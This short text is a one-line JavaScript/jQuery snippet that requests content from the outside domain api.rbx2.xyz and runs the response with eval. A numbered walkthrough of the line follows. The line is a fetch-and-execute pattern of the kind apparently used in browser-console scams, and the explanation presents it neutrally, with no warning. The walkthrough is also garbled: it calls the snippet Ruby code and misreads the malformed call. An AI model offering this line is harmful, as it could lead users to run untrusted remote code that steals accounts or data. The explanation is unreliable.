$javascript $.get('//api.rbx2.xyz/rbx id=16553' eval)

  1. The first step is to use the $javascript variable to access the JavaScript functionality within the Ruby code.

  2. The $.get() function is called, which is a shorthand method in jQuery used to send an HTTP GET request to a specified URL.

  3. The URL passed as the argument to the $.get() function is //api.rbx2.xyz/rbx, which is the endpoint where the GET request is sent.

  4. The query parameter id=16553 is appended to the URL. This parameter specifies the ID that needs to be included in the request.

  5. Finally, the eval function is invoked. eval is a JavaScript function used to evaluate or execute JavaScript code dynamically.

By executing this code, a GET request is made to the specified URL with the query parameter id=16553, and the response is then dynamically evaluated using the eval function.